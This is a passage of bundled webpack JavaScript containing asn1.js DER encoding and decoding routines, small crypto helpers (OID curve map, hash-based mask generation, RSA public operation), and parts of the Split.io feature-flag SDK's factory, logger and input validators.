DERNode.prototype._decodeTag = function decodeTag(buffer, tag, any) {
  var decodedTag = derDecodeTag(buffer,
                                'Failed to decode tag of "' + tag + '"');
  if (buffer.isError(decodedTag))
    return decodedTag;

  var len = derDecodeLen(buffer,
                         decodedTag.primitive,
                         'Failed to get length of "' + tag + '"');

  // Failure
  if (buffer.isError(len))
    return len;

  if (!any &&
      decodedTag.tag !== tag &&
      decodedTag.tagStr !== tag &&
      decodedTag.tagStr + 'of' !== tag) {
    return buffer.error('Failed to match tag: "' + tag + '"');
  }

  if (decodedTag.primitive || len !== null)
    return buffer.skip(len, 'Failed to match body of: "' + tag + '"');

  // Indefinite length... find END tag
  var state = buffer.save();
  var res = this._skipUntilEnd(
      buffer,
      'Failed to skip indefinite length body: "' + this.tag + '"');
  if (buffer.isError(res))
    return res;

  len = buffer.offset - state.offset;
  buffer.restore(state);
  return buffer.skip(len, 'Failed to match body of: "' + tag + '"');
};

DERNode.prototype._skipUntilEnd = function skipUntilEnd(buffer, fail) {
  while (true) {
    var tag = derDecodeTag(buffer, fail);
    if (buffer.isError(tag))
      return tag;
    var len = derDecodeLen(buffer, tag.primitive, fail);
    if (buffer.isError(len))
      return len;

    var res;
    if (tag.primitive || len !== null)
      res = buffer.skip(len)
    else
      res = this._skipUntilEnd(buffer, fail);

    // Failure
    if (buffer.isError(res))
      return res;

    if (tag.tagStr === 'end')
      break;
  }
};

DERNode.prototype._decodeList = function decodeList(buffer, tag, decoder,
                                                    options) {
  var result = [];
  while (!buffer.isEmpty()) {
    var possibleEnd = this._peekTag(buffer, 'end');
    if (buffer.isError(possibleEnd))
      return possibleEnd;

    var res = decoder.decode(buffer, 'der', options);
    if (buffer.isError(res) && possibleEnd)
      break;
    result.push(res);
  }
  return result;
};

DERNode.prototype._decodeStr = function decodeStr(buffer, tag) {
  if (tag === 'bitstr') {
    var unused = buffer.readUInt8();
    if (buffer.isError(unused))
      return unused;
    return { unused: unused, data: buffer.raw() };
  } else if (tag === 'bmpstr') {
    var raw = buffer.raw();
    if (raw.length % 2 === 1)
      return buffer.error('Decoding of string type: bmpstr length mismatch');

    var str = '';
    for (var i = 0; i < raw.length / 2; i++) {
      str += String.fromCharCode(raw.readUInt16BE(i * 2));
    }
    return str;
  } else if (tag === 'numstr') {
    var numstr = buffer.raw().toString('ascii');
    if (!this._isNumstr(numstr)) {
      return buffer.error('Decoding of string type: ' +
                          'numstr unsupported characters');
    }
    return numstr;
  } else if (tag === 'octstr') {
    return buffer.raw();
  } else if (tag === 'objDesc') {
    return buffer.raw();
  } else if (tag === 'printstr') {
    var printstr = buffer.raw().toString('ascii');
    if (!this._isPrintstr(printstr)) {
      return buffer.error('Decoding of string type: ' +
                          'printstr unsupported characters');
    }
    return printstr;
  } else if (/str$/.test(tag)) {
    return buffer.raw().toString();
  } else {
    return buffer.error('Decoding of string type: ' + tag + ' unsupported');
  }
};

DERNode.prototype._decodeObjid = function decodeObjid(buffer, values, relative) {
  var result;
  var identifiers = [];
  var ident = 0;
  while (!buffer.isEmpty()) {
    var subident = buffer.readUInt8();
    ident <<= 7;
    ident |= subident & 0x7f;
    if ((subident & 0x80) === 0) {
      identifiers.push(ident);
      ident = 0;
    }
  }
  if (subident & 0x80)
    identifiers.push(ident);

  var first = (identifiers[0] / 40) | 0;
  var second = identifiers[0] % 40;

  if (relative)
    result = identifiers;
  else
    result = [first, second].concat(identifiers.slice(1));

  if (values) {
    var tmp = values[result.join(' ')];
    if (tmp === undefined)
      tmp = values[result.join('.')];
    if (tmp !== undefined)
      result = tmp;
  }

  return result;
};

DERNode.prototype._decodeTime = function decodeTime(buffer, tag) {
  var str = buffer.raw().toString();
  if (tag === 'gentime') {
    var year = str.slice(0, 4) | 0;
    var mon = str.slice(4, 6) | 0;
    var day = str.slice(6, 8) | 0;
    var hour = str.slice(8, 10) | 0;
    var min = str.slice(10, 12) | 0;
    var sec = str.slice(12, 14) | 0;
  } else if (tag === 'utctime') {
    var year = str.slice(0, 2) | 0;
    var mon = str.slice(2, 4) | 0;
    var day = str.slice(4, 6) | 0;
    var hour = str.slice(6, 8) | 0;
    var min = str.slice(8, 10) | 0;
    var sec = str.slice(10, 12) | 0;
    if (year < 70)
      year = 2000 + year;
    else
      year = 1900 + year;
  } else {
    return buffer.error('Decoding ' + tag + ' time is not supported yet');
  }

  return Date.UTC(year, mon - 1, day, hour, min, sec, 0);
};

DERNode.prototype._decodeNull = function decodeNull(buffer) {
  return null;
};

DERNode.prototype._decodeBool = function decodeBool(buffer) {
  var res = buffer.readUInt8();
  if (buffer.isError(res))
    return res;
  else
    return res !== 0;
};

DERNode.prototype._decodeInt = function decodeInt(buffer, values) {
  // Bigint, return as it is (assume big endian)
  var raw = buffer.raw();
  var res = new bignum(raw);

  if (values)
    res = values[res.toString(10)] || res;

  return res;
};

DERNode.prototype._use = function use(entity, obj) {
  if (typeof entity === 'function')
    entity = entity(obj);
  return entity._getDecoder('der').tree;
};

// Utility methods

function derDecodeTag(buf, fail) {
  var tag = buf.readUInt8(fail);
  if (buf.isError(tag))
    return tag;

  var cls = der.tagClass[tag >> 6];
  var primitive = (tag & 0x20) === 0;

  // Multi-octet tag - load
  if ((tag & 0x1f) === 0x1f) {
    var oct = tag;
    tag = 0;
    while ((oct & 0x80) === 0x80) {
      oct = buf.readUInt8(fail);
      if (buf.isError(oct))
        return oct;

      tag <<= 7;
      tag |= oct & 0x7f;
    }
  } else {
    tag &= 0x1f;
  }
  var tagStr = der.tag[tag];

  return {
    cls: cls,
    primitive: primitive,
    tag: tag,
    tagStr: tagStr
  };
}

function derDecodeLen(buf, primitive, fail) {
  var len = buf.readUInt8(fail);
  if (buf.isError(len))
    return len;

  // Indefinite form
  if (!primitive && len === 0x80)
    return null;

  // Definite form
  if ((len & 0x80) === 0) {
    // Short form
    return len;
  }

  // Long form
  var num = len & 0x7f;
  if (num > 4)
    return buf.error('length octect is too long');

  len = 0;
  for (var i = 0; i < num; i++) {
    len <<= 8;
    var j = buf.readUInt8(fail);
    if (buf.isError(j))
      return j;
    len |= j;
  }

  return len;
}


/***/ }),
/* 1263 */
/***/ (function(module, exports, __webpack_require__) {

var inherits = __webpack_require__(25);
var Buffer = __webpack_require__(43).Buffer;

var asn1 = __webpack_require__(351);
var base = asn1.base;

// Import DER constants
var der = asn1.constants.der;

function DEREncoder(entity) {
  this.enc = 'der';
  this.name = entity.name;
  this.entity = entity;

  // Construct base tree
  this.tree = new DERNode();
  this.tree._init(entity.body);
};
module.exports = DEREncoder;

DEREncoder.prototype.encode = function encode(data, reporter) {
  return this.tree._encode(data, reporter).join();
};

// Tree methods

function DERNode(parent) {
  base.Node.call(this, 'der', parent);
}
inherits(DERNode, base.Node);

DERNode.prototype._encodeComposite = function encodeComposite(tag,
                                                              primitive,
                                                              cls,
                                                              content) {
  var encodedTag = encodeTag(tag, primitive, cls, this.reporter);

  // Short form
  if (content.length < 0x80) {
    var header = new Buffer(2);
    header[0] = encodedTag;
    header[1] = content.length;
    return this._createEncoderBuffer([ header, content ]);
  }

  // Long form
  // Count octets required to store length
  var lenOctets = 1;
  for (var i = content.length; i >= 0x100; i >>= 8)
    lenOctets++;

  var header = new Buffer(1 + 1 + lenOctets);
  header[0] = encodedTag;
  header[1] = 0x80 | lenOctets;

  for (var i = 1 + lenOctets, j = content.length; j > 0; i--, j >>= 8)
    header[i] = j & 0xff;

  return this._createEncoderBuffer([ header, content ]);
};

DERNode.prototype._encodeStr = function encodeStr(str, tag) {
  if (tag === 'bitstr') {
    return this._createEncoderBuffer([ str.unused | 0, str.data ]);
  } else if (tag === 'bmpstr') {
    var buf = new Buffer(str.length * 2);
    for (var i = 0; i < str.length; i++) {
      buf.writeUInt16BE(str.charCodeAt(i), i * 2);
    }
    return this._createEncoderBuffer(buf);
  } else if (tag === 'numstr') {
    if (!this._isNumstr(str)) {
      return this.reporter.error('Encoding of string type: numstr supports ' +
                                 'only digits and space');
    }
    return this._createEncoderBuffer(str);
  } else if (tag === 'printstr') {
    if (!this._isPrintstr(str)) {
      return this.reporter.error('Encoding of string type: printstr supports ' +
                                 'only latin upper and lower case letters, ' +
                                 'digits, space, apostrophe, left and rigth ' +
                                 'parenthesis, plus sign, comma, hyphen, ' +
                                 'dot, slash, colon, equal sign, ' +
                                 'question mark');
    }
    return this._createEncoderBuffer(str);
  } else if (/str$/.test(tag)) {
    return this._createEncoderBuffer(str);
  } else if (tag === 'objDesc') {
    return this._createEncoderBuffer(str);
  } else {
    return this.reporter.error('Encoding of string type: ' + tag +
                               ' unsupported');
  }
};

DERNode.prototype._encodeObjid = function encodeObjid(id, values, relative) {
  if (typeof id === 'string') {
    if (!values)
      return this.reporter.error('string objid given, but no values map found');
    if (!values.hasOwnProperty(id))
      return this.reporter.error('objid not found in values map');
    id = values[id].split(/[\s\.]+/g);
    for (var i = 0; i < id.length; i++)
      id[i] |= 0;
  } else if (Array.isArray(id)) {
    id = id.slice();
    for (var i = 0; i < id.length; i++)
      id[i] |= 0;
  }

  if (!Array.isArray(id)) {
    return this.reporter.error('objid() should be either array or string, ' +
                               'got: ' + JSON.stringify(id));
  }

  if (!relative) {
    if (id[1] >= 40)
      return this.reporter.error('Second objid identifier OOB');
    id.splice(0, 2, id[0] * 40 + id[1]);
  }

  // Count number of octets
  var size = 0;
  for (var i = 0; i < id.length; i++) {
    var ident = id[i];
    for (size++; ident >= 0x80; ident >>= 7)
      size++;
  }

  var objid = new Buffer(size);
  var offset = objid.length - 1;
  for (var i = id.length - 1; i >= 0; i--) {
    var ident = id[i];
    objid[offset--] = ident & 0x7f;
    while ((ident >>= 7) > 0)
      objid[offset--] = 0x80 | (ident & 0x7f);
  }

  return this._createEncoderBuffer(objid);
};

function two(num) {
  if (num < 10)
    return '0' + num;
  else
    return num;
}

DERNode.prototype._encodeTime = function encodeTime(time, tag) {
  var str;
  var date = new Date(time);

  if (tag === 'gentime') {
    str = [
      two(date.getFullYear()),
      two(date.getUTCMonth() + 1),
      two(date.getUTCDate()),
      two(date.getUTCHours()),
      two(date.getUTCMinutes()),
      two(date.getUTCSeconds()),
      'Z'
    ].join('');
  } else if (tag === 'utctime') {
    str = [
      two(date.getFullYear() % 100),
      two(date.getUTCMonth() + 1),
      two(date.getUTCDate()),
      two(date.getUTCHours()),
      two(date.getUTCMinutes()),
      two(date.getUTCSeconds()),
      'Z'
    ].join('');
  } else {
    this.reporter.error('Encoding ' + tag + ' time is not supported yet');
  }

  return this._encodeStr(str, 'octstr');
};

DERNode.prototype._encodeNull = function encodeNull() {
  return this._createEncoderBuffer('');
};

DERNode.prototype._encodeInt = function encodeInt(num, values) {
  if (typeof num === 'string') {
    if (!values)
      return this.reporter.error('String int or enum given, but no values map');
    if (!values.hasOwnProperty(num)) {
      return this.reporter.error('Values map doesn\'t contain: ' +
                                 JSON.stringify(num));
    }
    num = values[num];
  }

  // Bignum, assume big endian
  if (typeof num !== 'number' && !Buffer.isBuffer(num)) {
    var numArray = num.toArray();
    if (!num.sign && numArray[0] & 0x80) {
      numArray.unshift(0);
    }
    num = new Buffer(numArray);
  }

  if (Buffer.isBuffer(num)) {
    var size = num.length;
    if (num.length === 0)
      size++;

    var out = new Buffer(size);
    num.copy(out);
    if (num.length === 0)
      out[0] = 0
    return this._createEncoderBuffer(out);
  }

  if (num < 0x80)
    return this._createEncoderBuffer(num);

  if (num < 0x100)
    return this._createEncoderBuffer([0, num]);

  var size = 1;
  for (var i = num; i >= 0x100; i >>= 8)
    size++;

  var out = new Array(size);
  for (var i = out.length - 1; i >= 0; i--) {
    out[i] = num & 0xff;
    num >>= 8;
  }
  if(out[0] & 0x80) {
    out.unshift(0);
  }

  return this._createEncoderBuffer(new Buffer(out));
};

DERNode.prototype._encodeBool = function encodeBool(value) {
  return this._createEncoderBuffer(value ? 0xff : 0);
};

DERNode.prototype._use = function use(entity, obj) {
  if (typeof entity === 'function')
    entity = entity(obj);
  return entity._getEncoder('der').tree;
};

DERNode.prototype._skipDefault = function skipDefault(dataBuffer, reporter, parent) {
  var state = this._baseState;
  var i;
  if (state['default'] === null)
    return false;

  var data = dataBuffer.join();
  if (state.defaultBuffer === undefined)
    state.defaultBuffer = this._encodeValue(state['default'], reporter, parent).join();

  if (data.length !== state.defaultBuffer.length)
    return false;

  for (i=0; i < data.length; i++)
    if (data[i] !== state.defaultBuffer[i])
      return false;

  return true;
};

// Utility methods

function encodeTag(tag, primitive, cls, reporter) {
  var res;

  if (tag === 'seqof')
    tag = 'seq';
  else if (tag === 'setof')
    tag = 'set';

  if (der.tagByName.hasOwnProperty(tag))
    res = der.tagByName[tag];
  else if (typeof tag === 'number' && (tag | 0) === tag)
    res = tag;
  else
    return reporter.error('Unknown tag: ' + tag);

  if (res >= 0x1f)
    return reporter.error('Multi-octet tag encoding unsupported');

  if (!primitive)
    res |= 0x20;

  res |= (der.tagClassByName[cls || 'universal'] << 6);

  return res;
}


/***/ }),
/* 1264 */
/***/ (function(module, exports) {

module.exports = {"1.3.132.0.10":"secp256k1","1.3.132.0.33":"p224","1.2.840.10045.3.1.1":"p192","1.2.840.10045.3.1.7":"p256","1.3.132.0.34":"p384","1.3.132.0.35":"p521"}

/***/ }),
/* 1265 */
/***/ (function(module, exports, __webpack_require__) {

var createHash = __webpack_require__(346)
var Buffer = __webpack_require__(41).Buffer

module.exports = function (seed, len) {
  var t = Buffer.alloc(0)
  var i = 0
  var c
  while (t.length < len) {
    c = i2ops(i++)
    t = Buffer.concat([t, createHash('sha1').update(seed).update(c).digest()])
  }
  return t.slice(0, len)
}

function i2ops (c) {
  var out = Buffer.allocUnsafe(4)
  out.writeUInt32BE(c, 0)
  return out
}


/***/ }),
/* 1266 */
/***/ (function(module, exports) {

module.exports = function xor (a, b) {
  var len = a.length
  var i = -1
  while (++i < len) {
    a[i] ^= b[i]
  }
  return a
}


/***/ }),
/* 1267 */
/***/ (function(module, exports, __webpack_require__) {

var BN = __webpack_require__(63)
var Buffer = __webpack_require__(41).Buffer

function withPublic (paddedMsg, key) {
  return Buffer.from(paddedMsg
    .toRed(BN.mont(key.modulus))
    .redPow(new BN(key.publicExponent))
    .fromRed()
    .toArray())
}

module.exports = withPublic


/***/ }),
/* 1268 */,
/* 1269 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export Flag */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return flagsToOrderedMap; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();



// A Treatment is a specific configuration of a feature.


var Flag = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  treatment: 'control',
  config: null
});

var flagsToOrderedMap = function flagsToOrderedMap(flags) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(flags).toOrderedMap().mapEntries(function (_ref) {
    var _ref2 = _slicedToArray(_ref, 2),
        k = _ref2[0],
        v = _ref2[1];

    return [k, Flag(v)];
  });
};

/***/ }),
/* 1270 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return SPLIT_SDK_READY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return SPLIT_SDK_UPDATE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return SPLIT_SDK_READY_TIMED_OUT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FEATURES_UPDATED; });
var prefix = function prefix(str) {
  return 'station/features/' + str;
};

var SPLIT_SDK_READY = prefix('SPLIT_SDK_READY');
var SPLIT_SDK_UPDATE = prefix('SPLIT_SDK_UPDATE');
var SPLIT_SDK_READY_TIMED_OUT = prefix('SPLIT_SDK_READY_TIMED_OUT');

var FEATURES_UPDATED = prefix('FEATURES_UPDATED');

/***/ }),
/* 1271 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = SplitFactory;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__manager__ = __webpack_require__(2753);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__storage__ = __webpack_require__(2762);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__readiness__ = __webpack_require__(2774);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_settings__ = __webpack_require__(2775);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__utils_context__ = __webpack_require__(2785);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__utils_key_parser__ = __webpack_require__(1279);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__utils_timeTracker__ = __webpack_require__(278);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__factory_online__ = __webpack_require__(2789);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__factory_offline__ = __webpack_require__(2879);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__readiness_statusManager__ = __webpack_require__(2885);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__utils_constants__ = __webpack_require__(56);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12__utils_inputValidation__ = __webpack_require__(202);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13__integrations__ = __webpack_require__(2887);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14__impressions_counter__ = __webpack_require__(2890);







var log = Object(__WEBPACK_IMPORTED_MODULE_6__utils_logger__["b" /* default */])('splitio');









var buildInstanceId = function buildInstanceId(key, trafficType) {
  return (key.matchingKey ? key.matchingKey : key) + "-" + (key.bucketingKey ? key.bucketingKey : key) + "-" + (trafficType !== undefined ? trafficType : '');
};

function SplitFactory(config) {
  // Cache instances created per factory.
  var clientInstances = {}; // Tracking times. We need to do it here because we need the storage created.

  var readyLatencyTrackers = {
    splitsReadyTracker: __WEBPACK_IMPORTED_MODULE_7__utils_timeTracker__["a" /* default */].start(__WEBPACK_IMPORTED_MODULE_7__utils_timeTracker__["a" /* default */].TaskNames.SPLITS_READY),
    segmentsReadyTracker: __WEBPACK_IMPORTED_MODULE_7__utils_timeTracker__["a" /* default */].start(__WEBPACK_IMPORTED_MODULE_7__utils_timeTracker__["a" /* default */].TaskNames.SEGMENTS_READY),
    sdkReadyTracker: __WEBPACK_IMPORTED_MODULE_7__utils_timeTracker__["a" /* default */].start(__WEBPACK_IMPORTED_MODULE_7__utils_timeTracker__["a" /* default */].TaskNames.SDK_READY)
  };
  var context = new __WEBPACK_IMPORTED_MODULE_4__utils_context__["a" /* default */](); // Put settings config within context

  var settings = Object(__WEBPACK_IMPORTED_MODULE_3__utils_settings__["a" /* default */])(config);
  context.put(context.constants.SETTINGS, settings); // We will just log and allow for the SDK to end up throwing an SDK_TIMEOUT event for devs to handle.

  Object(__WEBPACK_IMPORTED_MODULE_12__utils_inputValidation__["b" /* validateApiKey */])(settings.core.authorizationKey); // Put readiness and statusManager within context
  // Done before adding storage, to let it access readiness gate synchronously

  var gateFactory = Object(__WEBPACK_IMPORTED_MODULE_2__readiness__["a" /* default */])();
  var readiness = gateFactory(settings.startup.readyTimeout);
  context.put(context.constants.READINESS, readiness);
  var statusManager = Object(__WEBPACK_IMPORTED_MODULE_10__readiness_statusManager__["a" /* default */])(context);
  context.put(context.constants.STATUS_MANAGER, statusManager); // Put storage config within context

  var storage = Object(__WEBPACK_IMPORTED_MODULE_1__storage__["a" /* default */])(context);
  context.put(context.constants.STORAGE, storage); // Put counter

  var impressionsCounter = new __WEBPACK_IMPORTED_MODULE_14__impressions_counter__["a" /* default */](); // Instantiates new counter for Impressions

  context.put(context.constants.IMPRESSIONS_COUNTER, impressionsCounter); // Put integrationsManager within context.
  // It needs to access the storage, settings and potentially other pieces, so it's registered after them.

  var integrationsManager = Object(__WEBPACK_IMPORTED_MODULE_13__integrations__["a" /* default */])(context);
  context.put(context.constants.INTEGRATIONS_MANAGER, integrationsManager); // Define which type of factory to use

  var splitFactory = settings.mode === __WEBPACK_IMPORTED_MODULE_11__utils_constants__["g" /* LOCALHOST_MODE */] ? __WEBPACK_IMPORTED_MODULE_9__factory_offline__["a" /* default */] : __WEBPACK_IMPORTED_MODULE_8__factory_online__["a" /* default */];

  var _splitFactory = splitFactory(context, readyLatencyTrackers),
      mainClientInstance = _splitFactory.api,
      mainClientMetricCollectors = _splitFactory.metricCollectors; // It makes no sense to have multiple instances of the manager.


  var managerInstance = Object(__WEBPACK_IMPORTED_MODULE_0__manager__["a" /* default */])(storage.splits, context);
  var parsedDefaultKey = Object(__WEBPACK_IMPORTED_MODULE_5__utils_key_parser__["a" /* default */])(settings.core.key);
  var defaultInstanceId = buildInstanceId(parsedDefaultKey, settings.core.trafficType);
  clientInstances[defaultInstanceId] = mainClientInstance;
  log.info('New Split SDK instance created.');
  return {
    // Split evaluation and event tracking engine
    client: function client(key, trafficType) {
      if (key === undefined) {
        log.debug('Retrieving default SDK client.');
        return mainClientInstance;
      }

      if (typeof storage.shared != 'function') {
        throw new Error('Shared Client not supported by the storage mechanism. Create isolated instances instead.');
      } // Validate the key value


      var validKey = Object(__WEBPACK_IMPORTED_MODULE_12__utils_inputValidation__["i" /* validateKey */])(key, 'Shared Client instantiation');

      if (validKey === false) {
        throw new Error('Shared Client needs a valid key.');
      }

      var validTrafficType;

      if (trafficType !== undefined) {
        validTrafficType = Object(__WEBPACK_IMPORTED_MODULE_12__utils_inputValidation__["m" /* validateTrafficType */])(trafficType, 'Shared Client instantiation');

        if (validTrafficType === false) {
          throw new Error('Shared Client needs a valid traffic type or no traffic type at all.');
        }
      }

      var instanceId = buildInstanceId(validKey, validTrafficType);

      if (!clientInstances[instanceId]) {
        var sharedSettings = settings.overrideKeyAndTT(validKey, validTrafficType);
        var sharedContext = new __WEBPACK_IMPORTED_MODULE_4__utils_context__["a" /* default */]();

        var _readiness = gateFactory(sharedSettings.startup.readyTimeout);

        sharedContext.put(context.constants.READY_FROM_CACHE, context.get(context.constants.READY_FROM_CACHE, true));
        sharedContext.put(context.constants.READINESS, _readiness); // for shared clients, the internal offset of added/removed SDK_READY callbacks is -1

        sharedContext.put(context.constants.STATUS_MANAGER, Object(__WEBPACK_IMPORTED_MODULE_10__readiness_statusManager__["a" /* default */])(sharedContext, -1));
        sharedContext.put(context.constants.SETTINGS, sharedSettings);
        sharedContext.put(context.constants.STORAGE, storage.shared(sharedSettings));
        sharedContext.put(context.constants.IMPRESSIONS_COUNTER, impressionsCounter); // As shared clients reuse all the storage information, we don't need to check here if we
        // will use offline or online mode. We should stick with the original decision.

        clientInstances[instanceId] = splitFactory(sharedContext, false, mainClientMetricCollectors).api;
        log.info('New shared client instance created.');
      } else {
        log.debug('Retrieving existing SDK client.');
      }

      return clientInstances[instanceId];
    },
    // Manager API to explore available information
    manager: function manager() {
      log.info('Manager instance retrieved.');
      return managerInstance;
    },
    // Logger wrapper API
    Logger: __WEBPACK_IMPORTED_MODULE_6__utils_logger__["a" /* API */],
    // Expose SDK settings
    settings: settings
  };
}

/***/ }),
/* 1272 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return LogLevels; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return setLogLevel; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return Logger; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* eslint-disable no-console */



var LogLevels = {
  'DEBUG': 'DEBUG',
  'INFO': 'INFO',
  'WARN': 'WARN',
  'ERROR': 'ERROR',
  'NONE': 'NONE'
}; // DEBUG is the default. The log level is not specific to an SDK instance.

var GlobalLogLevel = LogLevels.DEBUG;
var setLogLevel = function setLogLevel(level) {
  GlobalLogLevel = level;
};
var defaultOptions = {
  showLevel: true,
  displayAllErrors: false
};
var Logger = /*#__PURE__*/function () {
  function Logger(category, options) {
    this.category = category;
    this.options = __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({}, defaultOptions, options);
  }

  var _proto = Logger.prototype;

  _proto.debug = function debug(msg) {
    if (this._shouldLog(LogLevels.DEBUG)) this._log(LogLevels.DEBUG, msg);
  };

  _proto.info = function info(msg) {
    if (this._shouldLog(LogLevels.INFO)) this._log(LogLevels.INFO, msg);
  };

  _proto.warn = function warn(msg) {
    if (this._shouldLog(LogLevels.WARN)) this._log(LogLevels.WARN, msg);
  };

  _proto.error = function error(msg) {
    if (this.options.displayAllErrors || this._shouldLog(LogLevels.ERROR)) this._log(LogLevels.ERROR, msg);
  };

  _proto._log = function _log(level, text) {
    var formattedText = this._generateLogMessage(level, text);

    console.log(formattedText);
  };

  _proto._generateLogMessage = function _generateLogMessage(level, text) {
    var textPre = ' => ';
    var result = '';

    if (this.options.showLevel) {
      result += '[' + level + ']' + (level === LogLevels.INFO || level === LogLevels.WARN ? ' ' : '') + ' ';
    }

    if (this.category) {
      result += this.category + textPre;
    }

    return result += text;
  };

  _proto._shouldLog = function _shouldLog(level) {
    var logLevel = GlobalLogLevel;
    var levels = Object.keys(LogLevels).map(function (f) {
      return LogLevels[f];
    });
    var index = levels.indexOf(level); // What's the index of what it's trying to check if it should log

    var levelIdx = levels.indexOf(logLevel); // What's the current log level index.

    return index >= levelIdx;
  };

  return Logger;
}();

/***/ }),
/* 1273 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = isLocalStorageAvailable;
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/
function isLocalStorageAvailable() {
  var mod = '__SPLITSOFTWARE__';

  try {
    localStorage.setItem(mod, mod);
    localStorage.removeItem(mod);
    return true;
  } catch (e) {
    return false;
  }
}

/***/ }),
/* 1274 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = validateSplit;
/* harmony export (immutable) */ __webpack_exports__["b"] = validateSplitExistance;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__labels__ = __webpack_require__(277);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__logger__ = __webpack_require__(9);



var log = Object(__WEBPACK_IMPORTED_MODULE_2__logger__["b" /* default */])(''); // include BOM and nbsp

var TRIMMABLE_SPACES_REGEX = /^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/;
function validateSplit(maybeSplit, method, item) {
  if (item === void 0) {
    item = 'split name';
  }

  if (maybeSplit == undefined) {
    // eslint-disable-line eqeqeq
    log.error(method + ": you passed a null or undefined " + item + ", " + item + " must be a non-empty string.");
  } else if (!Object(__WEBPACK_IMPORTED_MODULE_0__lang__["j" /* isString */])(maybeSplit)) {
    log.error(method + ": you passed an invalid " + item + ", " + item + " must be a non-empty string.");
  } else {
    if (TRIMMABLE_SPACES_REGEX.test(maybeSplit)) {
      log.warn(method + ": " + item + " \"" + maybeSplit + "\" has extra whitespace, trimming.");
      maybeSplit = maybeSplit.trim();
    }

    if (maybeSplit.length > 0) {
      return maybeSplit;
    } else {
      log.error(method + ": you passed an empty " + item + ", " + item + " must be a non-empty string.");
    }
  }

  return false;
}
/**
 * This is defined here and in this format mostly because of the logger and the fact that it's considered a validation at product level.
 * But it's not going to run on the input validation layer. In any case, the most compeling reason to use it as we do is to avoid going to Redis and get a split twice.
 */

function validateSplitExistance(context, splitName, labelOrSplitObj, method) {
  if (context.get(context.constants.READY, true)) {
    // Only if it's ready we validate this, otherwise it may just be that the SDK is not ready yet.
    if (labelOrSplitObj === __WEBPACK_IMPORTED_MODULE_1__labels__["g" /* SPLIT_NOT_FOUND */] || labelOrSplitObj == null) {
      log.warn(method + ": you passed \"" + splitName + "\" that does not exist in this environment, please double check what Splits exist in the web console.");
      return false;
    }
  }

  return true;
}

/***/ }),
/* 1275 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = validateSplits;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__split__ = __webpack_require__(1274);



var log = Object(__WEBPACK_IMPORTED_MODULE_1__logger__["b" /* default */])('');
function validateSplits(maybeSplits, method, listName, item) {
